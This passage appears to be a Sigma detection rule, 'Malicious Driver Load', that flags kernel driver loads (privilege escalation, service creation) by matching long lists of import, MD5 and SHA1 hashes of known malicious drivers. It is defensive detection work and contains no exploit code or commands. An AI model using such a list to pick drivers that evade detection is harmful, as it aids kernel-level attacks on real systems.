- IMPHASH=abdaca21ab5c831000b0aa4b8f357716
- IMPHASH=0555907292d07d9f78205416eb1924d3
- IMPHASH=832f0fb3579a07b1c4bec82b4478306b
- IMPHASH=340e874a1ca966e45fc2a314ef228cce
- IMPHASH=b35d1d3faa6c97b106b343823d5df867
- IMPHASH=7e1327419d10a7eeece5579526f75d9f
- IMPHASH=084b99aebda8a13e4f774a2ced272e85
- IMPHASH=81ba5280406320ce6f03a9817d7d6035
- IMPHASH=e4f1a9234e4ea105321909d4c0e597ae
- IMPHASH=68a12eb3f32f7e193bd0d722ea6be4ab
- IMPHASH=c3fd2e688276a184b2528ee590054e5a
- IMPHASH=531d2392dbdd314fb1d9318fe9e5c4d2
- IMPHASH=29a1da8841f5363423dcba1a9773809a
- IMPHASH=9fc4a96d982ebfd6b9d87c0f3ebef681
- IMPHASH=304c4fcf70cfc8299a3b6eed8e7bbb31
- IMPHASH=3415f704b3149ea9a3d3a54036b208dd
- IMPHASH=7cf815757705e26b809574488ed56d0e
- IMPHASH=28d780857f0f6616f938aca3a38b5072
- IMPHASH=235102691b04f562ae8aa7ece38d8bc9
- IMPHASH=262d8fbbf1f514399bb3f230cddc12af
- IMPHASH=0f3ddbe229201f6fa9a3dbbaf842a556
- IMPHASH=bd093a7d5ba5632ee52f3466a688ee55
- IMPHASH=a9e22f5e8f4965960716d94ba7639c9f
- IMPHASH=528ac7a1e034801d1f20238971c6ec19
- IMPHASH=45bfe170e0cd654bc1e2ae3fca3ac3f4
- IMPHASH=7c8c655791b5c853e45aa174e5cc1333
- IMPHASH=a53b095a8d7366075d445892070cde51
- IMPHASH=f079f8637a1d4fe2fb93af2a267b68ef
- IMPHASH=0ebd5902a82ddfef8ed96678c1573a7b
- IMPHASH=9a970527986cd03e5a25d18b372624a1
- IMPHASH=87fde0c3f8e7dff7ab0d718d6b1252c8
- IMPHASH=959dce366573a7aae10b74a08931722a
- IMPHASH=fce118020e70919e5c8c629687f89e56
- IMPHASH=86682585c620fa85096a7bedaf990cd1
- IMPHASH=5f9cf5b0511f3c1129b467d273b921f2
- IMPHASH=543f80399f79401471523d335ea61642
- IMPHASH=3ca448454c33a5c72ad5e774de47930a
- IMPHASH=51ecd9b363fde1f003f4b4f20c874b1b
- IMPHASH=1f2627fc453dc35031a9502372bd3549
- IMPHASH=2cf48a541dc193e91bb2a831adcf278e
- IMPHASH=805e4a267f9495e7c0c430d92b78f8bd
- IMPHASH=92caaf6ebb43bbe61f3da8526172f776
- IMPHASH=421730c2b3fa3a7d78c2eda3da1be6a8
- IMPHASH=aa54fa0523f677e56d6d8199e5e18732
- IMPHASH=8ee2435c62b02fe0372cde028be489cb
- IMPHASH=50b6a9c4df6d0c9f517c804ad1307d7c
- IMPHASH=037b9d19995faadf69a2ce134473e346
- IMPHASH=2c19472843b56c67efb80d8c447f3cfe
- IMPHASH=a74f61fdcea718cb9579907b2caf54ab
- IMPHASH=84d45ee8df6f63b5af419d89003a97bc
- IMPHASH=69dbb4c8bbe4d8c2e1493f82170b93c4
- IMPHASH=6903b92e7760c5d7f7c181b64eb13176
- IMPHASH=d6f977640d4810a784d152e4d3c63a6b
- IMPHASH=473c3773ca11aa7371dbf350919c5724
- IMPHASH=87842ffa59724bda8389394bcaeb5d73
- IMPHASH=18502b56d9ea5dea7f9d31ef85db31d5
- IMPHASH=b6f67458e30912358144df4adf5264fd
- IMPHASH=a49a51d7f2ae972483961eb64d17888e
- IMPHASH=81e2eb25e24938b90806de865630a2b2
- IMPHASH=96861132665e8d66c0a91e6c02cc6639
- IMPHASH=69163e5596280d3319375c9bcd4b5da1
- IMPHASH=4946030efb34ab167180563899d5eb27
- IMPHASH=4c304943af1b07b15a5efa80f17d9b89
- IMPHASH=821d74031d3f625bcbd0df08b70f1e77
- IMPHASH=1bef18e9dda6f1e7bbf7eb76e9ccf16b
- IMPHASH=21f58b1f2de6ad0e9c019da7a4e7317b
- IMPHASH=91387ac37086b9b519f945b58095f38d
- IMPHASH=dcd41632f0ad9683e5c9c7cc083f78f7
- IMPHASH=ced7ea67fdf3d89a48849e0062278f7d
- IMPHASH=5713a0c2b363c49706fa0e60151511a8
- IMPHASH=089e8a8f2bb007852c63b64e66430293
- IMPHASH=383be1d728b0be96be1b810a131705ee
- IMPHASH=3d42ff70269b824dd9d4a8cb905669f9
- IMPHASH=363922cc73591e60f2af113182414230
- IMPHASH=fa084cdc36f03f1aeddaa3450e2781b1
- IMPHASH=3c61f9a38aaa7650fcd33b46e794d1bb
- IMPHASH=42e3f2ffa29901e572f2df03cb872159
- IMPHASH=4c5fc4519f1417f0630c3343aab7c9d2
- IMPHASH=d5d40497d82daf7e44255ede810ce7a6
- IMPHASH=91ee149529956a79a91eeb8c48f00b3d
- IMPHASH=a387f215b4964a3ca2e3c92f235a6d1b
- IMPHASH=ca6e77f472ebd5b2ade876e7c773bb57
- IMPHASH=67bace81ce26ddf73732dd75cbd0c0f2
- IMPHASH=18b8de84bd7aa83fec79d2c6aaf0a4f5
- IMPHASH=519cf5394541bf5e2869edeec81521e1
- IMPHASH=cae90f82e91b9a60af9a0e36c1f73be4
- IMPHASH=643f4d79f35dddc9bb5cc04a0f0c18d3
- IMPHASH=6b7d4c6283b9b951b7b2f47a0c5be8c7
- IMPHASH=b4c857bd3a7b1d8125c0f62aec45401e
- IMPHASH=49a12b06131d938e9dc40c693b88ba7f
- IMPHASH=f74aa24adc713dbb957ccb18f3c16a71
- IMPHASH=6faad89adbfc9d5448bb1bd12e7714cd
- IMPHASH=5759d90322a7311eaccf4f0ab2c2a7c4
- IMPHASH=8b6c1a09e11200591663b880a94a8d18
- IMPHASH=eade2a2576f329e4971bf5044ab24ac7
- IMPHASH=8b47d6faba90b5c89e27f7119c987e1a
- IMPHASH=4433528b0f664177546dd3e229f0daa5
- IMPHASH=c0f234205c50cc713673353c9653eea1
- IMPHASH=b4b90c1b054ebe273bff4b2fd6927990
- IMPHASH=f2dc136141066311fddef65f7f417c44
- IMPHASH=12a08688ec92616a8b639d85cc13a3ed
- IMPHASH=296afaa5ea70bbd17135afcd04758148
- IMPHASH=8232d2f79ce126e84cc044543ad82790
- IMPHASH=e10e743d152cf62f219a7e9192fb533d
- IMPHASH=e5af2438da6df2aa9750aa632c80cfa4
- IMPHASH=3a4e0bc46866ca54459753f62c879b62
- IMPHASH=10cb3185e13390f8931a50a131448cdf
- IMPHASH=4fb27d2712ef4afdb67e0921d64a5f1e
- IMPHASH=a96a02cf5f7896a9a9f045d1986bd83c
- IMPHASH=fd894d394a8ca9abd74f7210ed931682
- IMPHASH=ca07de87d444c1d2d10e16e9dcc2dc19
- IMPHASH=1aa10b05dee9268d7ce87f5f56ea9ded
- IMPHASH=485f7e86663d49c68c8b5f705d310f50
- IMPHASH=5899e93373114ca9e458e906675132b7
- IMPHASH=be2d638c3933fc3f5a96e539f9910c5f
- IMPHASH=fbfa302bf7eb5d615d0968541ee49ce4
- IMPHASH=f9b9487f25a2c1e08c02f391387c5323
- IMPHASH=ef102e058f6b88af0d66d26236257706
- IMPHASH=0f371a913e9fa3ba3a923718e489debb
Malicious Driver Load
- source: sigma
- technicques:
- t1068
- t1543
- t1543.003
Description
Detects loading of known malicious drivers via their hash.
Detection logic
condition: selection
selection:
Hashes|contains:
- MD5=5be61a24f50eb4c94d98b8a82ef58dcf
- MD5=d70a80fc73dd43469934a7b1cc623c76
- MD5=3b71eab204a5f7ed77811e41fed73105
- MD5=528ce5ce19eb34f401ef024de7ddf222
- MD5=ae548418b491cd3f31618eb9e5730973
- MD5=72f53f55898548767e0276c472be41e8
- MD5=508faa4647f305a97ed7167abc4d1330
- MD5=ed2b653d55c03f0bffa250372d682b75
- MD5=0d2ba47286f1c68e87622b3a16bf9d92
- MD5=3164bd6c12dd0fe1bdf3b833d56323b9
- MD5=70fd7209ce5c013a1f9e699b5cc86cdc
- MD5=c71be7b112059d2dc84c0f952e04e6cc
- MD5=acac842a46f3501fe407b1db1b247a0b
- MD5=01c2e4d8234258451083d6ce4e8910b7
- MD5=c8541a9cef64589593e999968a0385b9
- MD5=e172a38ade3aa0a2bc1bf9604a54a3b5
- MD5=6fcf56f6ca3210ec397e55f727353c4a
- MD5=2b80be31fbb11d4c1ef6d6a80b2e0c16
- MD5=07056573d464b0f5284f7e3acedd4a3f
- MD5=c7b7f1edb9bbef174e6506885561d85d
- MD5=d5918d735a23f746f0e83f724c4f26e5
- MD5=84763d8ca9fe5c3bff9667b2adf667de
- MD5=fb593b1f1f80d20fc7f4b818065c64b6
- MD5=909f3fc221acbe999483c87d9ead024a
- MD5=e29f6311ae87542b3d693c1f38e4e3ad
- MD5=aeb0801f22d71c7494e884d914446751
- MD5=3f11a94f1ac5efdd19767c6976da9ba4
- MD5=be6318413160e589080df02bb3ca6e6a
- MD5=0b311af53d2f4f77d30f1aed709db257
- MD5=d075d56dfce6b9b13484152b1ef40f93
- MD5=27384ec4c634701012a2962c30badad2
- MD5=5eb2c576597dd21a6b44557c237cf896
- MD5=f56db4eba3829c0918413b5c0b42f00f
- MD5=e27b2486aa5c256b662812b465b6036c
- MD5=db86dfd7aefbb5be6728a63461b0f5f3
- MD5=04a88f5974caa621cee18f34300fc08a
- MD5=5129d8fd53d6a4aba81657ab2aa5d243
- MD5=cd2c641788d5d125c316ed739c69bb59
- MD5=7073cd0085fcba1cd7d3568f9e6d652c
- MD5=24f0f2b4b3cdae11de1b81c537df41c7
- MD5=88bea56ae9257b40063785cf47546024
- MD5=63060b756377fce2ce4ab9d079ca732f
- MD5=50b39072d0ee9af5ef4824eca34be6e3
- MD5=57c18a8f5d1ba6d015e4d5bc698e3624
- MD5=7d26985a5048bad57d9c223362f3d55c
- MD5=ba54a0dbe2685e66e21d41b4529b3528
- MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11
- MD5=b52f51bbe6b49d0b475d943c29c4d4cb
- MD5=a837302307dace2a00d07202b661bce2
- MD5=78a122d926ccc371d60c861600c310f3
- MD5=bdb305aa0806f8b38b7ce43c927fe919
- MD5=27053e964667318e1b370150cbca9138
- MD5=6a4fbcfb44717eae2145c761c1c99b6a
- MD5=d13c1b76b4a1ca3ff5ab63678b51df6d
- MD5=6a066d2be83cf83f343d0550b0b8f206
- MD5=7108b0d4021af4c41de2c223319cd4c1
- MD5=1cd158a64f3d886357535382a6fdad75
- MD5=e939448b28a4edc81f1f974cebf6e7d2
- MD5=4198d3db44d7c4b3ba9072d258a4fc2d
- MD5=4a27a2bdc6fbe39eeec6455fb1e0ef20
- MD5=30ca3cc19f001a8f12c619daa8c6b6e3
- MD5=fe9004353b25640f6a879e57f07122d7
- MD5=06c7fcf3523235cf52b3eee083ec07b2
- MD5=364605ad21b9275681cffef607fac273
- MD5=968ddb06af90ef83c5f20fbdd4eee62e
- MD5=ba50bd645d7c81416bb26a9d39998296
- MD5=29e03f4811b64969e48a99300978f58c
- MD5=b0770094c3c64250167b55e4db850c04
- MD5=40b968ecdbe9e967d92c5da51c390eee
- MD5=b6b530dd25c5eb66499968ec82e8791e
- MD5=f209cb0e468ca0b76d879859d5c8c54e
- MD5=76f8607fc4fb9e828d613a7214436b66
- MD5=4b058945c9f2b8d8ebc485add1101ba5
- MD5=faae7f5f69fde12303dd1c0c816b72b7
- MD5=89d294ef7fefcdf1a6ca0ab96a856f57
- MD5=ef0e1725aaf0c6c972593f860531a2ea
- MD5=bbdbffebfc753b11897de2da7c9912a5
- MD5=5ebfc0af031130ba9de1d5d3275734b3
- MD5=22949977ce5cd96ba674b403a9c81285
- MD5=77cfd3943cc34d9f5279c330cd8940bc
- MD5=311de109df18e485d4a626b5dbe19bc6
- MD5=2730cc25ad385acc7213a1261b21c12d
- MD5=87dc81ebe85f20c1a7970e495a778e60
- MD5=154b45f072fe844676e6970612fd39c7
- MD5=5a4fe297c7d42539303137b6d75b150d
- MD5=d6a1dd7b2c06f058b408b3613c13d413
- MD5=a6e9d6505f6d2326a8a9214667c61c67
- MD5=7fad9f2ef803496f482ce4728578a57a
- MD5=5076fba3d90e346fd17f78db0a4aa12c
- MD5=79df0eabbf2895e4e2dae15a4772868c
- MD5=14580bd59c55185115fd3abe73b016a2
- MD5=1f2888e57fdd6aee466962c25ba7d62d
- MD5=5e9231e85cecfc6141e3644fda12a734
- MD5=dc564bac7258e16627b9de0ce39fae25
- MD5=4e4c068c06331130334f23957fca9e3c
- MD5=1ee9f6326649cd23381eb9d7dfdeddf7
- MD5=4e1f656001af3677856f664e96282a6f
- MD5=36f44643178c505ea0384e0fb241e904
- MD5=6b480fac7caca2f85be9a0cfe79aedfc
- MD5=c1ab425977d467b64f437a6c5ad82b44
- MD5=fe508caa54ffeb2285d9f00df547fe4a
- MD5=d3af70287de8757cebc6f8d45bb21a20
- MD5=990b949894b7dc82a8cf1131b063cb1a
- MD5=c62209b8a5daf3f32ad876ad6cefda1b
- MD5=c159fb0f345a8771e56aab8e16927361
- MD5=19b15eeccab0752c6793f782ca665a45
- MD5=1d51029dfbd616bf121b40a0d1efeb10
- MD5=157a22689629ec876337f5f9409918d5
- MD5=3dd829fb27353622eff34be1eabb8f18
- MD5=8636fe3724f2bcba9399daffd6ef3c7e
- MD5=3d0b3e19262099ade884b75ba86ca7e8
- MD5=97539c78d6e2b5356ce79e40bcd4d570
- MD5=0308b6888e0f197db6704ca20203eee4
- MD5=091a6bd4880048514c5dd3bede15eba5
- MD5=7e92f98b809430622b04e88441b2eb04
- MD5=bb5bda8889d8d27ef984dbd6ad82c946
- MD5=b76aee508f68b5b6dccd6e1f66f4cf8b
- MD5=a822b9e6eedf69211013e192967bf523
- MD5=df52f8a85eb64bc69039243d9680d8e4
- MD5=bfbdea0589fb77c7a7095cf5cd6e8b7a
- MD5=44857ca402a15ab51dc5afe47abdfa44
- MD5=f9844524fb0009e5b784c21c7bad4220
- MD5=d34b218c386bfe8b1f9c941e374418d7
- MD5=0ca010a32a9b0aeae1e46d666b83b659
- MD5=93496a436c5546156a69deb255a9fed0
- MD5=1cd5e231064e03c596e819b6ff48daf9
- MD5=70a71fe86df717ac59dbf856d7ac5789
- MD5=a33089d4e50f7d2ea8b52ca95d26ebf3
- MD5=e0cc9b415d884f85c45be145872892b8
- MD5=a42249a046182aaaf3a7a7db98bfa69d
- MD5=c5ae6ca044bd03c3506c132b033be1dc
- MD5=7ebe606acd81abf1f8cb0767c974164b
- MD5=b5dcc869a91efcc6e8ea0c3c07605d63
- MD5=62c18d61ed324088f963510bae43b831
- MD5=093a2a635c3a27aac50efd6463f4efa1
- MD5=28102acca39ad0199f262ba9958be3f4
- MD5=650ef9dd70cb192027e536754d6e0f63
- MD5=32eb3d2bf2c5b3da2d2a1f20fffbac44
- MD5=6771b13a53b9c7449d4891e427735ea2
- MD5=072ba2309b825ce1dba37d8d924ea8ed
- MD5=2d37d2fb9b9f8ac52bc02cba4487e3cb
- MD5=1325ec39e98225e487b40043faee8052
- MD5=4484f4007de2c3ee4581a2cff77ca3b4
- MD5=a236e7d654cd932b7d11cb604629a2d0
- MD5=17509f0a98dc5c5d52c3f9ac1428a21b
- MD5=840a5edf2534dd23a082cf7b28cbfc4d
- MD5=77a7ed4798d02ef6636cd0fd07fc382a
- MD5=a9df5964635ef8bd567ae487c3d214c4
- MD5=8b75047199825c8e62fdcc1c915db8bd
- MD5=d416494232c4197cb36a914df2e17677
- MD5=4cf14a96485a1270fed97bb8000e4f86
- MD5=35e512f9bedc89dca5ce81f35820714c
- MD5=40f35792e7565aa047796758a3ce1b77
- MD5=f7f31bccc9b7b2964ac85106831022b1
- MD5=26aedc10d4215ba997495d3a68355f4a
- MD5=10f3679384a03cb487bda9621ceb5f90
- MD5=80219fb6b5954c33e16bac5ecdac651b
- MD5=cee36b5c6362993fa921435979bfbe4a
- MD5=e37a08f516b8a7ca64163f5d9e68fe5a
- MD5=49518f7375a5f995ebe9423d8f19cfe4
- MD5=920df6e42cf91bbe19707f5a86e3c5c5
- MD5=2ec877e425bd7eddb663627216e3491e
- MD5=550b7991d93534bc510bc4f237155a7a
- MD5=98d53f6b3bec0a3417a04fbb9e17fa06
- MD5=13a57a4ef721440c7c9208b51f7c05de
- MD5=c5fc3605194e033bdf3781ff2adaeb61
- MD5=6e625ec04c20a9dbd48c7060efbf5e92
- MD5=0b9b78d1281c7d4ab50497cf6ea7452a
- MD5=4e906fcb13e2793c98f47291fd69391b
- MD5=2bb353891d65c9e267eb98a3a2b694c3
- MD5=7d86cdda7f49f91fdb69901a002b34e7
- MD5=f69b06ca7c34d16f26ea1c6861edf62a
- MD5=ee6b1a79cb6641aa44c762ee90786fe0
- MD5=1fc7aeeff3ab19004d2e53eae8160ab1
- MD5=24d3ea54f25e32832ac20335a1ce1062
- MD5=c94f405c5929cfcccc8ad00b42c95083
- MD5=b164daf106566f444dfb280d743bc2f7
- MD5=93130909e562925597110a617f05e2a9
- MD5=f589d4bf547c140b6ec8a511ea47c658
- MD5=bf445ac375977ecf551bc2a912c58e8a
- MD5=629ee55e4b5a225d048fbcd5f0a1d18b
- MD5=0023ca0ca16a62d93ef51f3df98b2f94
- MD5=a3d69c7e24300389b56782aa63b0e357
- MD5=cbd8d370462503508e44dba023bdf9bc
- MD5=67daa04716803a15fc11c9e353d77c2f
- MD5=c9d4214c850e0cedf033dc8f0cd3aace
- MD5=bd5b0514f3b40f139d8079138d01b5f6
- MD5=19bdd9b799e3c2c54c0d7fff68b31c20
- MD5=f242cffd9926c0ccf94af3bf16b6e527
- MD5=5aeab9427d85951def146b4c0a44fc63
- MD5=40170485cca576adb5266cf5b0d3b0bd
- MD5=c277c4386a78fae1b7e17eaecf4f472b
- MD5=58c37866cbc3d1338e4fc58ada924ffe
- MD5=0f16a43f7989034641fd2de3eb268bf1
- MD5=0ae30291c6cbfa7be39320badd6e8de0
- MD5=05dd59bd4f175304480affd8f1305c37
- MD5=f838f4eb36f1e7036238776c7a70f0b0
- MD5=85093bb9f027027c2c61aee50796de30
- MD5=ae338d91d1b05a72559b7f6ed717362d
- MD5=bd91787b5dcb2189b856804e85dfa1d9
- MD5=6b3c1511e12f4d27a4ea3b18020d7b84
- MD5=97264fd62d4907bdac917917a07b3b7a
- MD5=6ececf26ff8b03ed7ffbddadec9a9dab
- MD5=47e6ac52431ca47da17248d80bf71389
- MD5=eb57f03b7603f0b235af62e8cd5be8c2
- MD5=e1a9aa4c14669b1fb1f67a7266f87e82
- MD5=29047f0b7790e524b09a06852d31a117
- MD5=4dd6250eb2d368f500949952eb013964
- MD5=fb7c61ef427f9b2fdff3574ee6b1819b
- MD5=844af8c877f5da723c1b82cf6e213fc1
- MD5=e39152eadd76751b1d7485231b280948
- MD5=ac6e29f535b2c42999c50d2fc32f2c9c
- MD5=2406ea37152d2154be3fef6d69ada2c6
- MD5=0ea8389589c603a8b05146bd06020597
- MD5=754e21482baf18b8b0ed0f4be462ba03
- MD5=c4a517a02ba9f6eac5cf06e3629cc076
- MD5=32282e07db321e8d7849f2287bb6a14f
- MD5=32b67a6cd6dd998b9f563ed13d54a8bc
- MD5=3359e1d4244a7d724949c63e89689ef8
- MD5=5917e415a5bf30b3fcbcbcb8a4f20ee0
- MD5=0bdd51cc33e88b5265dfb7d88c5dc8d6
- MD5=a90236e4962620949b720f647a91f101
- MD5=ccde8c94439f9fc9c42761e4b9a23d97
- MD5=68caf620ef8deaf06819cf8c80d3367b
- MD5=5fec28e8f4f76e5ede24beb32a32b9d7
- MD5=e8eac6642b882a6196555539149c73f2
- MD5=aa98b95f5cbae8260122de06a215ee10
- MD5=a5bcaa2fc87b42e2e5d62a2e5dfcbc80
- MD5=abc168fdca7169bf9dc40cec9761018d
- MD5=7f9309f5e4defec132b622fadbcad511
- MD5=4748696211bd56c2d93c21cab91e82a5
- MD5=48394dce30bb8da5ae089cb8f41b86dc
- MD5=65f800e1112864bf41eb815649f428d5
- MD5=bd25be845c151370ff177509d95d5add
- MD5=a37ed7663073319d02f2513575a22995
- MD5=2c39f6172fbc967844cac12d7ab2fa55
- MD5=491aec2249ad8e2020f9f9b559ab68a8
- MD5=1e0eb80347e723fa31fce2abb0301d44
- MD5=a26363e7b02b13f2b8d697abb90cd5c3
- MD5=4118b86e490aed091b1a219dba45f332
- MD5=6d131a7462e568213b44ef69156f10a5
- MD5=10c2ea775c9e76e7774ab89e38f38287
- SHA1=994e3f5dd082f5d82f9cc84108a60d359910ba79
- SHA1=4f7989ad92b8c47c004d3731b7602ce0934d7a23
- SHA1=f2fe02e28cf418d935ec63168caf4dff6a9fbdfe
- SHA1=af42afda54d150810a60baa7987f9f09d49d1317
- SHA1=09375f13521fc0cacf2cf0a28b2a9248f71498d7
- SHA1=c75e8fceed74a4024d38ca7002d42e1ecf982462
- SHA1=03e82eae4d8b155e22ffdafe7ba0c4ab74e8c1a7
- SHA1=e730eb971ecb493b69de2308b6412836303f733a
- SHA1=6a95860594cd8b7e3636bafa8f812e05359a64ca
- SHA1=5fef884a901e81ac173d63ade3f5c51694decf74
- SHA1=a8ddb7565b61bc021cd2543a137e00627f999dcc
- SHA1=6451522b1fb428e549976d0742df5034f8124b17
- SHA1=8ad0919629731b9a8062f7d3d4a727b28f22e81a
- SHA1=cc65bf60600b64feece5575f21ab89e03a728332
- SHA1=bbc8bd714c917bb1033f37e4808b4b002cd04166
- SHA1=4f2d9a70ea24121ae01df8a76ffba1f9cc0fde4a
- SHA1=f6a18fc9c4abe4a82c1ab28abc0a7259df8de7a3
- SHA1=c42178977bd7bbefe084da0129ed808cb7266204
- SHA1=766949d4599fbf8f45e888c9d6fedf21e04fb333
- SHA1=b7ff8536553cb236ea2607941e634b23aadb59ee
- SHA1=76789196eebfd4203f477a5a6c75eefc12d9a837
- SHA1=e5566684a9e0c1afadae80c3a8be6636f6cad7cf
- SHA1=7638c048af5beae44352764390deea597cc3e7b1
- SHA1=6a6fe0d69e0ea34d695c3b525e6db639f9ad6ac5
- SHA1=08dd35dde6187af579a1210e00eadbcea29e66d2
- SHA1=9ee31f1f25f675a12b7bad386244a9fbfa786a87
- SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e
- SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d
- SHA1=505546d82aab56889a923004654b9afdec54efe6
- SHA1=0fe2d22bd2e6b7874f4f2b6279e2ca05edd1222a
- SHA1=8aa0e832e5ca2eb79dafabadbe9948a191008383
- SHA1=844d7bcd1a928d340255ff42971cca6244a459bf
- SHA1=9e2ebc489c50b6bbae3b08473e007baa65ff208f
- SHA1=7e836dadc2e149a0b758c7e22c989cbfcce18684
- SHA1=2480549ec8564cd37519a419ab2380cf3e8bab9e
- SHA1=8b9dd4c001f17e7835fdaf0d87a2f3e026557e84
- SHA1=d3f6c3ea2ef7124403c0fb6e7e3a0558729b5285
- SHA1=40df7a55c200371853cc3fd3cc03b5ac932f5cd6
- SHA1=607387cc90b93d58d6c9a432340261fde846b1d9
- SHA1=2779c54ccd1c008cd80e88c2b454d76f4fa18c07
- SHA1=46c9a474a1a62c25a05bc7661b75a80b471616e6
- SHA1=a2fe7de67b3f7d4b1def88ce4ba080f473c0fbc6
- SHA1=b8b123a413b7bccfa8433deba4f88669c969b543
- SHA1=bf2f8ada4e80aed4710993cedf4c5d32c95cd509
- SHA1=e3a1e7ce9e9452966885371e4c7fb48a2efdef22
- SHA1=c7f0423ac5569f13d2b195e02741ad7eed839c6d
- SHA1=a111dc6ae5575977feba71ee69b790e056846a02
- SHA1=ac4ace1c21c5cb72c6edf6f2f0cc3513d7c942c3
- SHA1=d4304bc75c2cb9917bb10a1dc630b75af194f7b2
- SHA1=0de86ec7d7f16a3680df89256548301eed970393
- SHA1=b2fb5036b29b12bcec04c3152b65b67ca14d61f2
- SHA1=0883a9c54e8442a551994989db6fc694f1086d41
- SHA1=01cf1fe3937fb6585ffb468b116a3af8ddf9ef16
- SHA1=98c4406fede34c3704afd8cf536ec20d93df9a10
- SHA1=1048f641adf3988d882a159bf1332eeb6d6a7f09
- SHA1=867652e062eb6bd1b9fc29e74dea3edd611ef40c
- SHA1=78fd06c82d3ba765c38bad8f48d1821a06280e39
- SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c
- SHA1=fdbcebb6cafda927d384d7be2e8063a4377d884f
- SHA1=994dc79255aeb662a672a1814280de73d405617a
- SHA1=6abc7979ba044f31884517827afb7b4bdaa0dcc1
- SHA1=1768f9c780fe7cf66928cfceaef8ed7d985e18f5
- SHA1=5fa527e679d25a15ecc913ce6a8d0218e2ff174b
- SHA1=f11188c540eada726766e0b0b2f9dd3ae2679c61
- SHA1=8416ee8fd88c3d069fbba90e959507c69a0ee3e9
- SHA1=ab4399647ebd16c02728c702534a30eb0b7ccbe7
- SHA1=98588b1d1b63747fa6ee406983bf50ad48a2208b
- SHA1=86e6669dbbce8228e94b2a9f86efdf528f0714fd
- SHA1=c9e9198d52d94771cb14711a5f6aaf8d82b602a2
- SHA1=17fa047c1f979b180644906fe9265f21af5b0509
- SHA1=1b526cbcba09b8d663e82004cf24ef44343030d3
- SHA1=4e0f5576804dab14abb29a29edb9616a1dbe280a
- SHA1=eb76de59ebc5b2258cff0567577ff8c9d0042048
- SHA1=d4f5323da704ff2f25d6b97f38763c147f2a0e6f
- SHA1=6802e2d2d4e6ee38aa513dafd6840e864310513b
- SHA1=ac18c7847c32957abe8155bcbe71c1f35753b527
- SHA1=beed6fb6a96996e9b016fa7f2cf7702a49c8f130
- SHA1=7d453dccb25bf36c411c92e2744c24f9b801225d
- SHA1=9648ad90ec683c63cc02a99111a002f9b00478d1
- SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a
- SHA1=31fac347aa26e92db4d8c9e1ba37a7c7a2234f08
- SHA1=fde0fff1c3e4c053148748504d4b9e0cc97f37ec
- SHA1=73bac306292b4e9107147db94d0d836fdb071e33
- SHA1=9382981b05b1fb950245313992444bfa0db5f881
- SHA1=acb8e45ebd1252313ece94198df47edf9294e7d3
- SHA1=9c36600c2640007d3410dea8017573a113374873
- SHA1=53f776d9a183c42b93960b270dddeafba74eb3fb
- SHA1=1fdb2474908bdd2ee1e9bd3f224626f9361caab7
- SHA1=3533d0a54c7ccd83afd6be24f6582b30e4ca0aab
- SHA1=cb25a5125fb353496b59b910263209f273f3552d
- SHA1=a5f1b56615bdaabf803219613f43671233f2001c
- SHA1=6c7663de88a0fba1f63a984f926c6ef449059e38
- SHA1=e514dfadbeb4d2305988c3281bf105d252dee3a7
- SHA1=632c80a3c95cf589b03812539dea59594eaefae0
- SHA1=e6966e360038be3b9d8c9b2582eba4e263796084
- SHA1=675cc00de7c1ef508ccd0c91770c82342c0ad4ab
- SHA1=6ae26bde7ec27bd0fa971de6c7500eee34ee9b51
- SHA1=80e4808a7fe752cac444676dbbee174367fa2083
- SHA1=77b4f0c0b06e3dc2474d5e250b772dacaac14dd0
- SHA1=7277d965b9de91b4d8ea5eb8ae7fa3899eef63a2
- SHA1=3825ebb0b0664b5f0789371240f65231693be37d
- SHA1=de9469a5d01fb84afd41d176f363a66e410d46da
- SHA1=91568d7a82cc7677f6b13f11bea5c40cf12d281b
- SHA1=4b882748faf2c6c360884c6812dd5bcbce75ebff
- SHA1=599de57a5c05e27bb72c7b8a677e531d8e4bf8b5
- SHA1=1d373361d3129d11bc43f9b6dfa81d06e5ca8358
- SHA1=c5bd9f2b3a51ba0da08d7c84bab1f2d03a95e405
- SHA1=89165bbb761d6742ac2a6f5efbffc80c17990bd8
- SHA1=97812f334a077c40e8e642bb9872ac2c49ddb9a2
- SHA1=d417c0be261b0c6f44afdec3d5432100e420c3ed
- SHA1=37e6450c7cd6999d080da94b867ba23faa8c32fe
- SHA1=9481cd590c69544c197b4ee055056302978a7191
- SHA1=ff3e19cd461ddf67529a765cbec9cb81d84dc7da
- SHA1=6972314b6d6b0109b9d0a951eb06041f531f589b
- SHA1=dd94a2436994ac35db91e0ec9438b95e438d38c5
- SHA1=dcc852461895311b56e3ae774c8e90782a79c0b4
- SHA1=3489ed43bdd11ccbfc892baaeae8102ff7d22f25
- SHA1=e38e1efd98cd8a3cdb327d386db8df79ea08dccc
- SHA1=d4cf9296271a9c5c40b0fa34f69b6125c2d14457
- SHA1=10fb4ba6b2585ea02e7afb53ff34bf184eeb1a5d
- SHA1=f6793243ad20359d8be40d3accac168a15a327fb
- SHA1=b34a012887ddab761b2298f882858fa1ff4d99f1
- SHA1=71469dce9c2f38d0e0243a289f915131bf6dd2a8
- SHA1=10115219e3595b93204c70eec6db3e68a93f3144
- SHA1=161bae224cf184ed6c09c77fae866d42412c6d25
- SHA1=07f78a47f447e4d8a72ad4bc6a26427b9577ec82
- SHA1=2929de0b5b5e1ba1cce1908e9d800aa21f448b3d
- SHA1=745335bcdf02fb42df7d890a24858e16094f48fd
- SHA1=2a202830db58d5e942e4f6609228b14095ed2cab
- SHA1=0167259abd9231c29bec32e6106ca93a13999f90
- SHA1=c23eeb6f18f626ce1fd840227f351fa7543bb167
- SHA1=613a9df389ad612a5187632d679da11d60f6046a
- SHA1=1ce17c54c6884b0319d5aabbe7f96221f4838514
- SHA1=025c4e1a9c58bf10be99f6562476b7a0166c6b86
- SHA1=c3aafe8f67c6738489377031cb5a1197e99b202d
- SHA1=50c6b3cafc35462009d02c10f2e79373936dd7bb
- SHA1=6df35a0c2f6d7d39d24277137ea840078dafb812
- SHA1=f92faed3ef92fa5bc88ebc1725221be5d7425528
- SHA1=3bd1a88cc7dae701bc7085639e1c26ded3f8ccb3
- SHA1=a3ed5cbfbc17b58243289f3cf575bf04be49591d
- SHA1=552730553a1dea0290710465fb8189bdd0eaad42
- SHA1=0291d0457acaf0fe8ed5c3137302390469ce8b35
- SHA1=07f282db28771838d0e75d6618f70d76acfe6082
